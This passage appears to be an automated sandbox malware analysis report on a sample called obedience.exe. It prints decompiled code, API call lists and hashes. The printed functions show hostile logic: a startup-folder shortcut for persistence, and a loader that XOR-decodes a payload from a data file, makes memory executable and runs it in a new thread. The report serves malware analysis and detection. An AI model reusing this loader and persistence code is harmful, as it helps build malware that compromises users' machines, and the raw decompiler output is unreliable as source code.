        • Part of subcall function 0044FFC4: GlobalAddAtomA.KERNEL32 ref: 00450069
        • Part of subcall function 0044FFC4: RegisterClipboardFormatA.USER32(00000000), ref: 0045007F
        • Part of subcall function 0044FFC4: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,0045013C), ref: 00450103
        • Part of subcall function 0044FFC4: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00450114
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
      • String ID:
      • API String ID: 3775504709-0
      • Opcode ID: 99a6a56ef9735737fb243dd123541b5c58fe268f1ee0796e937040d8834d0986
      • Instruction ID: 5f2b3dc7c252a93053ceec97a7601ca6eb9e7775c231ac8226f64bee21a35208
      • Opcode Fuzzy Hash: 99a6a56ef9735737fb243dd123541b5c58fe268f1ee0796e937040d8834d0986
      • Instruction Fuzzy Hash: 3CF03C382043405FC751EB66FC56A193394FB4671979008B7FD8483A72CA38AC95CB4C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004637A8 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
      Download Yara Rule
      C-Code - Quality: 37%
      			E004637A8(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00407550(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




      0x004637b4
      0x004637be
      0x004637c7
      0x004637ce
      0x004637d1
      0x004637d2
      0x004637dd
      0x004637e1

      APIs
      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004637D2
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: NtdllProc_Window
      • String ID:
      • API String ID: 4255912815-0
      • Opcode ID: f6783cbb0f82c5e6183b62038751e87edbaa8b553a5cbe2586449f86de3d3719
      • Instruction ID: a21ef04ae8dbeb1d7254c19205c9d438faeb913b3d1d138aaf0a52a2797f34f8
      • Opcode Fuzzy Hash: f6783cbb0f82c5e6183b62038751e87edbaa8b553a5cbe2586449f86de3d3719
      • Instruction Fuzzy Hash: A3F0C579605608AFCB40DF9DC588D8AFBE8BB4C360B058195B988CB721D234FD808F90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED91000 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 187stringcomCOMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 67%
      			E6ED91000() {
				signed int _v8;
				char _v267;
				char _v268;
				char _v1291;
				char _v1292;
				char _v2315;
				char _v2316;
				char _v3339;
				char _v3340;
				short _v7352;
				void* _v7356;
				void* _v7360;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t50;
				CHAR* _t68;
				intOrPtr* _t69;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t86;
				void* _t87;
				intOrPtr* _t88;
				intOrPtr* _t94;
				intOrPtr _t102;
				intOrPtr _t127;
				signed int _t133;

				L6ED9E0A0(0x1cbc);
				_t50 =  *0x6edaf2a0; // 0x267b4ecc
				_v8 = _t50 ^ _t133;
				_v3340 = 0;
				E6ED98BE0( &_v3339, 0, 0x3ff);
				_v1292 = 0;
				E6ED98BE0( &_v1291, 0, 0x3ff);
				_v2316 = 0;
				E6ED98BE0( &_v2315, 0, 0x3ff);
				_v268 = 0;
				E6ED98BE0( &_v267, 0, 0x103);
				GetModuleFileNameA(0, "C:\Users\jones\AppData\Local\Temp\obedience.exe", 0x104);
				_t132 = lstrcpyA;
				lstrcpyA( &_v268, "C:\Users\jones\AppData\Local\Temp\obedience.exe");
				lstrcpyA( &_v3340, "C:\Users\jones\AppData\Local\Temp\obedience.exe");
				__imp__SHGetSpecialFolderPathA(0,  &_v1292, 7, 0); // executed
				lstrcpyA( &_v2316,  &_v1292);
				_t131 = lstrcatA;
				lstrcatA( &_v2316, "\\");
				lstrcatA( &_v2316, "persuasion.lnk");
				 *((char*)(L6ED95C98( &_v3340, 0x5c) + 1)) = 0;
				_t68 = lstrcpyA( &_v1292,  &_v3340);
				__imp__CoInitialize(0); // executed
				__imp__CoCreateInstance(0x6eda61e8, 0, 1, 0x6eda61d8,  &_v7356); // executed
				_t69 = _v7356;
				_t102 =  *_t69;
				if(_t68 < 0) {
					L3:
					_t121 =  *((intOrPtr*)(_t102 + 8));
					 *((intOrPtr*)( *((intOrPtr*)(_t102 + 8))))(_t69);
					__imp__CoUninitialize();
					goto L4;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t102 + 0x50))))(_t69, "C:\Users\jones\AppData\Local\Temp\obedience.exe"); // executed
					_t74 = _v7356;
					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x2c))))(_t74, 0);
					_t76 = _v7356;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 0x1c))))(_t76, 0);
					_t78 = _v7356;
					 *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x24))))(_t78,  &_v1292);
					_t81 = _v7356;
					_push( &_v7360);
					_push(0x6eda61f8);
					_push(_t81);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t81))))() >= 0) {
						MultiByteToWideChar(0, 0,  &_v2316, 0xffffffff,  &_v7352, 0x104);
						_t86 = _v7360;
						_t127 =  *_t86;
						_t121 =  *((intOrPtr*)(_t127 + 0x18));
						_t87 =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x18))))(_t86,  &_v7352, 1); // executed
						if(_t87 < 0) {
							L4:
							return L6ED95B58(0, 0, _v8 ^ _t133, _t121, _t131, _t132);
						} else {
							_t88 = _v7360;
							 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
							 *((intOrPtr*)( *((intOrPtr*)( *_v7356 + 8))))(); // executed
							__imp__CoUninitialize(); // executed
							return L6ED95B58(1, 0, _v8 ^ _t133,  *((intOrPtr*)( *_v7356 + 8)), lstrcatA, lstrcpyA, _v7356);
						}
					} else {
						_t94 = _v7360;
						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
						_t69 = _v7356;
						_t102 =  *_t69;
						goto L3;
					}
				}
			}
































      0x6ed91008
      0x6ed9100d
      0x6ed91014
      0x6ed91029
      0x6ed9102f
      0x6ed91041
      0x6ed91047
      0x6ed91059
      0x6ed9105f
      0x6ed91071
      0x6ed91077
      0x6ed9108a
      0x6ed91090
      0x6ed910a2
      0x6ed910b0
      0x6ed910bd
      0x6ed910d1
      0x6ed910d3
      0x6ed910e5
      0x6ed910f3
      0x6ed91106
      0x6ed91117
      0x6ed9111a
      0x6ed91134
      0x6ed9113c
      0x6ed91142
      0x6ed91144
      0x6ed911b7
      0x6ed911b7
      0x6ed911bb
      0x6ed911bd
      0x00000000
      0x6ed91146
      0x6ed9114f
      0x6ed91151
      0x6ed9115e
      0x6ed91160
      0x6ed9116d
      0x6ed9116f
      0x6ed91182
      0x6ed91184
      0x6ed91192
      0x6ed91193
      0x6ed91198
      0x6ed9119f
      0x6ed911ed
      0x6ed911f3
      0x6ed911f9
      0x6ed911fb
      0x6ed91208
      0x6ed9120c
      0x6ed911c5
      0x6ed911d5
      0x6ed9120e
      0x6ed9120e
      0x6ed9121a
      0x6ed91228
      0x6ed9122a
      0x6ed91245
      0x6ed91245
      0x6ed911a1
      0x6ed911a1
      0x6ed911ad
      0x6ed911af
      0x6ed911b5
      0x00000000
      0x6ed911b5
      0x6ed9119f

      APIs
      • _memset.LIBCMT ref: 6ED9102F
      • _memset.LIBCMT ref: 6ED91047
      • _memset.LIBCMT ref: 6ED9105F
      • _memset.LIBCMT ref: 6ED91077
      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\obedience.exe,00000104), ref: 6ED9108A
      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\obedience.exe), ref: 6ED910A2
      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\obedience.exe), ref: 6ED910B0
      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 6ED910BD
      • lstrcpyA.KERNEL32(?,?), ref: 6ED910D1
      • lstrcatA.KERNEL32(?,6EDA8F38), ref: 6ED910E5
      • lstrcatA.KERNEL32(?,persuasion.lnk), ref: 6ED910F3
        • Part of subcall function 6ED95C98: __mbsrchr_l.LIBCMT ref: 6ED95CA5
      • lstrcpyA.KERNEL32(?,?), ref: 6ED91117
      • CoInitialize.OLE32(00000000), ref: 6ED9111A
      • CoCreateInstance.OLE32(6EDA61E8,00000000,00000001,6EDA61D8,?), ref: 6ED91134
      • CoUninitialize.OLE32 ref: 6ED911BD
      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 6ED911ED
      • CoUninitialize.OLE32 ref: 6ED9122A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: _memsetlstrcpy$Uninitializelstrcat$ByteCharCreateFileFolderInitializeInstanceModuleMultiNamePathSpecialWide__mbsrchr_l
      • String ID: C:\Users\user\AppData\Local\Temp\obedience.exe$persuasion.lnk
      • API String ID: 1421650274-2540443978
      • Opcode ID: 9c568d33768478b4c5e188ecd4b2c619395d95937d15debc9b2c10019de4ccfb
      • Instruction ID: a7150734d5ea74a184341718009713eb3e30068926ba22332875715a8caca070
      • Opcode Fuzzy Hash: 9c568d33768478b4c5e188ecd4b2c619395d95937d15debc9b2c10019de4ccfb
      • Instruction Fuzzy Hash: CE612C79A44218AFEB50DBA8CC85EEEB77CEF49344F0045C8E50997281DB34EE858F60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 6ED91B50 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 231stringsleepmemoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 215 6ed91b50-6ed91b9c GetModuleHandleA GetModuleFileNameA lstrcpyA 216 6ed91bab-6ed91bdf lstrcatA call 6ed93df0 215->216 217 6ed91b9e 215->217 222 6ed91be1-6ed91be2 call 6ed96a1f 216->222 223 6ed91be7-6ed91c04 call 6ed93a00 216->223 218 6ed91ba0-6ed91ba3 217->218 218->216 220 6ed91ba5-6ed91ba9 218->220 220->216 220->218 222->223 227 6ed91c29-6ed91c3a 223->227 228 6ed91c06-6ed91c27 223->228 229 6ed91c3e-6ed91c53 call 6ed94ed0 227->229 228->229 233 6ed91c89-6ed91ce9 call 6ed96310 call 6ed952a0 call 6ed94d70 call 6ed94de0 229->233 234 6ed91c55-6ed91c73 229->234 247 6ed91ceb-6ed91d00 233->247 248 6ed91d07-6ed91d1d 233->248 235 6ed91c78-6ed91c81 234->235 236 6ed91c75 234->236 235->233 238 6ed91c83-6ed91c84 call 6ed91950 235->238 236->235 238->233 249 6ed91d20-6ed91d29 247->249 250 6ed91d02-6ed91d05 247->250 248->249 251 6ed91d2b-6ed91d2c call 6ed91950 249->251 252 6ed91d31-6ed91d4e call 6ed938b0 call 6ed94ed0 249->252 250->249 251->252 258 6ed91d7b-6ed91db8 VirtualProtect 252->258 259 6ed91d50-6ed91d65 252->259 260 6ed91dba-6ed91dbf 258->260 261 6ed91e07-6ed91e0e call 6ed91000 258->261 262 6ed91d6a-6ed91d73 259->262 263 6ed91d67 259->263 265 6ed91dc2-6ed91dc6 260->265 271 6ed91e2a-6ed91e58 CreateThread CloseHandle Sleep call 6ed96a1f 261->271 272 6ed91e10-6ed91e25 lstrcpynA call 6ed91250 261->272 262->258 264 6ed91d75-6ed91d76 call 6ed91950 262->264 263->262 264->258 268 6ed91dc8-6ed91dca 265->268 269 6ed91ddf 265->269 273 6ed91dd0-6ed91ddb 268->273 274 6ed91de4-6ed91def 269->274 272->271 273->273 277 6ed91ddd 273->277 274->274 278 6ed91df1-6ed91dff 274->278 277->278 278->265 280 6ed91e01 278->280 280->261
      C-Code - Quality: 77%
      			E6ED91B50(void* __ebx) {
				char _v164;
				char _v180;
				intOrPtr _v184;
				intOrPtr _v252;
				char _v340;
				char _v348;
				char _v352;
				char _v364;
				intOrPtr _v372;
				CHAR* _v376;
				intOrPtr _v384;
				char _v388;
				long _v392;
				CHAR* _v396;
				intOrPtr _v400;
				intOrPtr _v408;
				struct _SECURITY_ATTRIBUTES* _v428;
				char _v436;
				intOrPtr* _v440;
				void* __edi;
				void* __esi;
				long _t109;
				char* _t111;
				intOrPtr _t117;
				intOrPtr _t118;
				long _t122;
				void* _t123;
				void* _t127;
				signed int _t132;
				signed int _t133;
				long _t134;
				long _t140;
				intOrPtr _t141;
				void* _t142;
				void* _t144;
				void* _t155;
				signed int _t159;
				signed int _t161;
				signed int _t162;
				signed int _t167;
				signed int _t168;
				intOrPtr _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr _t182;
				void* _t183;
				long _t185;
				intOrPtr* _t186;
				signed char _t193;
				intOrPtr _t194;
				void* _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				void* _t198;
				void* _t202;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t208;
				void* _t211;
				intOrPtr* _t212;
				char* _t217;
				signed char* _t219;
				signed int _t222;
				void* _t224;
				signed int _t225;
				void* _t248;

				_t224 = (_t222 & 0xfffffff8) - 0x18c;
				_v396 = 0;
				_t109 = GetModuleFileNameA(GetModuleHandleA(0), "C:\Users\jones\AppData\Local\Temp\handkerchief.dat", 0x104);
				_t215 = _t109;
				lstrcpyA("C:\Users\jones\AppData\Local\Temp\obedience.exe", "C:\Users\jones\AppData\Local\Temp\handkerchief.dat");
				_t3 = _t215 + 0x6edb12d7; // 0x6edb12d7
				_t111 = _t3;
				if( *((char*)(_t109 + 0x6edb12d7)) == 0) {
					L4:
					 *((char*)(_t111 + 1)) = 0;
					lstrcatA("C:\Users\jones\AppData\Local\Temp\handkerchief.dat", "handkerchief.dat");
					E6ED93DF0(_t229,  &_v180); // executed
					_t200 =  *((intOrPtr*)(_v184 + 4));
					if(( *(_t224 +  *((intOrPtr*)(_v184 + 4)) + 0xf4) & 0x00000006) != 0) {
						E6ED96A1F(0);
					}
					_t216 =  &_v180;
					E6ED93A00( &_v180); // executed
					_t117 =  *((intOrPtr*)(_v180 + 4));
					if(( *(_t224 + _t117 + 0xf4) & 0x00000006) != 0) {
						_t177 =  *0x6eda8a6c; // 0xffffffff
						_t118 =  *0x6eda8a68; // 0xffffffff
						_v384 = _t177;
						_t178 = 0;
						__eflags = 0;
						_v376 = 0;
					} else {
						_t208 =  *((intOrPtr*)( *((intOrPtr*)(_t224 + _t117 + 0x120))));
						_t200 =  *((intOrPtr*)(_t208 + 0x28));
						 *((intOrPtr*)( *((intOrPtr*)(_t208 + 0x28))))( &_v388, 0, 0, 1, 1);
						_t178 = _v400;
						_t118 = _v408;
					}
					 *0x6edb12cc = _t118 + _t178;
					if(E6ED94ED0( &_v164) == 0) {
						_t200 = _v180;
						_t197 =  *((intOrPtr*)(_v180 + 4));
						_t198 = _t224 + _t197 + 0xe8;
						_t167 =  *(_t224 + _t197 + 0xf4) | 0x00000002;
						if( *((intOrPtr*)(_t198 + 0x38)) == 0) {
							_t167 = _t167 | 0x00000004;
						}
						_t168 = _t167 & 0x00000017;
						 *(_t198 + 0xc) = _t168;
						_t235 =  *(_t198 + 0x10) & _t168;
						if(( *(_t198 + 0x10) & _t168) != 0) {
							_push(0);
							L6ED91950(_t198, 0);
						}
					}
					_t122 =  *0x6edb12cc; // 0x3e281
					_push(_t122); // executed
					_t123 = E6ED96310(_t200, 0, _t216, _t235); // executed
					_t225 = _t224 + 4;
					_t201 =  &_v364;
					 *0x6edb12d0 = _t123;
					_v364 = 0x6eda9418;
					_v348 = 0x6eda9420;
					_v252 = 0x6eda9360;
					L6ED952A0(_t235,  &_v364,  &_v340);
					_t217 =  &_v348;
					 *((intOrPtr*)(_t225 +  *((intOrPtr*)(_v372 + 4)) + 0x30)) = 0x6eda9414;
					E6ED94D70(_t217, _t235);
					_t127 = E6ED94DE0( &_v364, 0x21); // executed
					if(_t127 != 0) {
						_t57 = _v364 + 4; // 0x0
						_t182 =  *_t57;
						_t183 = _t225 + _t182 + 0x30;
						asm("sbb eax, eax");
						_t132 = ( ~( *(_t225 + _t182 + 0x68)) & 0xfffffffc) + 4;
						__eflags = _t132;
					} else {
						_t50 = _v364 + 4; // 0x0
						_t196 =  *_t50;
						_t183 = _t225 + _t196 + 0x30;
						_t132 =  *(_t225 + _t196 + 0x3c) | 0x00000002;
						if( *((intOrPtr*)(_t183 + 0x38)) == 0) {
							_t132 = _t132 | 0x00000004;
						}
					}
					_t133 = _t132 & 0x00000017;
					 *(_t183 + 0xc) = _t133;
					if(( *(_t183 + 0x10) & _t133) != 0) {
						_push(0);
						L6ED91950(_t183, 0);
					}
					_t134 =  *0x6edb12cc; // 0x3e281
					asm("cdq");
					E6ED938B0( &_v364, _t134, _t201); // executed
					if(E6ED94ED0( &_v352) == 0) {
						_t69 = _v364 + 4; // 0x0
						_t194 =  *_t69;
						_t195 = _t225 + _t194 + 0x30;
						_t161 =  *(_t225 + _t194 + 0x3c) | 0x00000002;
						if( *((intOrPtr*)(_t195 + 0x38)) == 0) {
							_t161 = _t161 | 0x00000004;
						}
						_t162 = _t161 & 0x00000017;
						 *(_t195 + 0xc) = _t162;
						if(( *(_t195 + 0x10) & _t162) != 0) {
							_push(0);
							L6ED91950(_t195, 0);
						}
					}
					_t185 =  *0x6edb12cc; // 0x3e281
					_t202 =  *0x6edb12d0; // 0x2580048
					VirtualProtect(_t202, _t185, 0x40,  &_v392);
					_t140 =  *0x6edb12cc; // 0x3e281
					_t211 =  *0x6edb12d0; // 0x2580048
					_t175 =  *0x6edb13dc; // 0x3e271
					_t141 = _t140 + 0xfffffff0;
					_t80 = _t211 + 0x10; // 0x2580058
					_t186 = _t80;
					_v396 = _t186;
					 *0x6edb12c8 = _t141;
					if(_t175 >= _t141) {
						L35:
						_t142 = E6ED91000(); // executed
						if(_t142 == 0) {
							lstrcpynA(0x6edb14e8, "pedetdata", 0x104);
							L6ED91250();
						}
						_t144 = CreateThread(0, 0, _v396, 0, 0, 0); // executed
						CloseHandle(_t144);
						Sleep(0x834); // executed
						E6ED96A1F(0); // executed
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xffffffff);
						_push(0x6eda579b);
						_push( *[fs:0x0]);
						_push(_t186);
						_push(_t217);
						_push(_t211);
						_push( *0x6edaf2a0 ^ _t225);
						 *[fs:0x0] =  &_v436;
						_t212 = _t186 + 0x70;
						_v440 = _t212;
						 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4)) + _t212 - 0x70)) = 0x6eda9414;
						_v428 = 0;
						L6ED93F00(_t212 - 0x58);
						_v428 = 0xffffffff;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x70)) + 4)) + _t212 - 0x70)) = 0x6eda93bc;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x60)) + 4)) + _t212 - 0x60)) = 0x6eda93b4;
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 - 0x70)) + 4)) + _t212 - 0x70)) = 0x6eda93ac;
						 *_t212 = 0x6eda9358;
						_t155 = E6EDA27C8(_t212);
						 *[fs:0x0] = _v436;
						return _t155;
					} else {
						asm("cdq");
						_t159 = _t141 - _t202 >> 1;
						_t219 = _t175 + _t186;
						do {
							_t193 =  *_t219;
							if(_t175 >= _t159) {
								_t205 = 8;
								do {
									_t193 = _t193 ^  *(_t205 + _t211);
									_t205 = _t205 + 2;
									 *_t219 = _t193;
									__eflags = _t205 - 0x10;
								} while (_t205 < 0x10);
								goto L33;
							}
							_t206 = 0;
							do {
								_t193 = _t193 ^  *(_t206 + _t211);
								_t206 = _t206 + 2;
								 *_t219 = _t193;
							} while (_t206 < 8);
							L33:
							_t175 = _t175 + 1;
							_t219 =  &(_t219[1]);
							 *0x6edb14e4 = _t205;
							_t248 = _t175 -  *0x6edb12c8; // 0x3e271
						} while (_t248 < 0);
						 *0x6edb13dc = _t175; // executed
						goto L35;
					}
				} else {
					while( *_t111 != 0x5c) {
						_t111 = _t111 - 1;
						_t229 =  *_t111;
						if( *_t111 != 0) {
							continue;
						}
						goto L4;
					}
					goto L4;
				}
			}





































































      0x6ed91b56
      0x6ed91b6c
      0x6ed91b77
      0x6ed91b87
      0x6ed91b89
      0x6ed91b96
      0x6ed91b96
      0x6ed91b9c
      0x6ed91bab
      0x6ed91bb5
      0x6ed91bb9
      0x6ed91bc7
      0x6ed91bd3
      0x6ed91bdf
      0x6ed91be2
      0x6ed91be2
      0x6ed91be7
      0x6ed91bee
      0x6ed91bfa
      0x6ed91c04
      0x6ed91c29
      0x6ed91c2f
      0x6ed91c34
      0x6ed91c38
      0x6ed91c38
      0x6ed91c3a
      0x6ed91c06
      0x6ed91c0d
      0x6ed91c0f
      0x6ed91c1d
      0x6ed91c1f
      0x6ed91c23
      0x6ed91c23
      0x6ed91c40
      0x6ed91c53
      0x6ed91c55
      0x6ed91c5c
      0x6ed91c66
      0x6ed91c6d
      0x6ed91c73
      0x6ed91c75
      0x6ed91c75
      0x6ed91c78
      0x6ed91c7b
      0x6ed91c7e
      0x6ed91c81
      0x6ed91c83
      0x6ed91c84
      0x6ed91c84
      0x6ed91c81
      0x6ed91c89
      0x6ed91c8e
      0x6ed91c8f
      0x6ed91c94
      0x6ed91c9c
      0x6ed91ca1
      0x6ed91ca6
      0x6ed91cae
      0x6ed91cb6
      0x6ed91cc1
      0x6ed91ccd
      0x6ed91cd1
      0x6ed91cd9
      0x6ed91ce2
      0x6ed91ce9
      0x6ed91d0b
      0x6ed91d0b
      0x6ed91d12
      0x6ed91d18
      0x6ed91d1d
      0x6ed91d1d
      0x6ed91ceb
      0x6ed91cef
      0x6ed91cef
      0x6ed91cf6
      0x6ed91cfa
      0x6ed91d00
      0x6ed91d02
      0x6ed91d02
      0x6ed91d00
      0x6ed91d20
      0x6ed91d26
      0x6ed91d29
      0x6ed91d2b
      0x6ed91d2c
      0x6ed91d2c
      0x6ed91d31
      0x6ed91d36
      0x6ed91d3e
      0x6ed91d4e
      0x6ed91d54
      0x6ed91d54
      0x6ed91d5b
      0x6ed91d5f
      0x6ed91d65
      0x6ed91d67
      0x6ed91d67
      0x6ed91d6a
      0x6ed91d6d
      0x6ed91d73
      0x6ed91d75
      0x6ed91d76
      0x6ed91d76
      0x6ed91d73
      0x6ed91d7b
      0x6ed91d81
      0x6ed91d90
      0x6ed91d96
      0x6ed91d9b
      0x6ed91da1
      0x6ed91da7
      0x6ed91daa
      0x6ed91daa
      0x6ed91dad
      0x6ed91db1
      0x6ed91db8
      0x6ed91e07
      0x6ed91e07
      0x6ed91e0e
      0x6ed91e1f
      0x6ed91e25
      0x6ed91e25
      0x6ed91e39
      0x6ed91e40
      0x6ed91e4b
      0x6ed91e53
      0x6ed91e58
      0x6ed91e59
      0x6ed91e5a
      0x6ed91e5b
      0x6ed91e5c
      0x6ed91e5d
      0x6ed91e5e
      0x6ed91e5f
      0x6ed91e63
      0x6ed91e65
      0x6ed91e70
      0x6ed91e71
      0x6ed91e72
      0x6ed91e73
      0x6ed91e7b
      0x6ed91e7f
      0x6ed91e87
      0x6ed91e8d
      0x6ed91e90
      0x6ed91e9b
      0x6ed91ea2
      0x6ed91ea7
      0x6ed91eb4
      0x6ed91ec2
      0x6ed91ed0
      0x6ed91ed9
      0x6ed91edf
      0x6ed91eea
      0x6ed91ef7
      0x6ed91dba
      0x6ed91dba
      0x6ed91dbd
      0x6ed91dbf
      0x6ed91dc2
      0x6ed91dc2
      0x6ed91dc6
      0x6ed91ddf
      0x6ed91de4
      0x6ed91de4
      0x6ed91de7
      0x6ed91dea
      0x6ed91dec
      0x6ed91dec
      0x00000000
      0x6ed91de4
      0x6ed91dc8
      0x6ed91dd0
      0x6ed91dd0
      0x6ed91dd3
      0x6ed91dd6
      0x6ed91dd8
      0x6ed91df1
      0x6ed91df1
      0x6ed91df2
      0x6ed91df3
      0x6ed91df9
      0x6ed91df9
      0x6ed91e01
      0x00000000
      0x6ed91e01
      0x6ed91ba0
      0x6ed91ba0
      0x6ed91ba5
      0x6ed91ba6
      0x6ed91ba9
      0x00000000
      0x00000000
      0x00000000
      0x6ed91ba9
      0x00000000
      0x6ed91ba0

      APIs
      • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\handkerchief.dat,00000104), ref: 6ED91B70
      • GetModuleFileNameA.KERNEL32(00000000), ref: 6ED91B77
      • lstrcpyA.KERNEL32(C:\Users\user\AppData\Local\Temp\obedience.exe,C:\Users\user\AppData\Local\Temp\handkerchief.dat), ref: 6ED91B89
      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\handkerchief.dat,handkerchief.dat), ref: 6ED91BB9
      • VirtualProtect.KERNELBASE(02580048,0003E281,00000040,?,6EDA9418,0003E281,?,00000021), ref: 6ED91D90
      • lstrcpynA.KERNEL32(6EDB14E8,pedetdata,00000104,?,00000021), ref: 6ED91E1F
      • CreateThread.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 6ED91E39
      • CloseHandle.KERNEL32(00000000,?,00000021), ref: 6ED91E40
      • Sleep.KERNELBASE(00000834,?,00000021), ref: 6ED91E4B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: HandleModule$CloseCreateFileNameProtectSleepThreadVirtuallstrcatlstrcpylstrcpyn
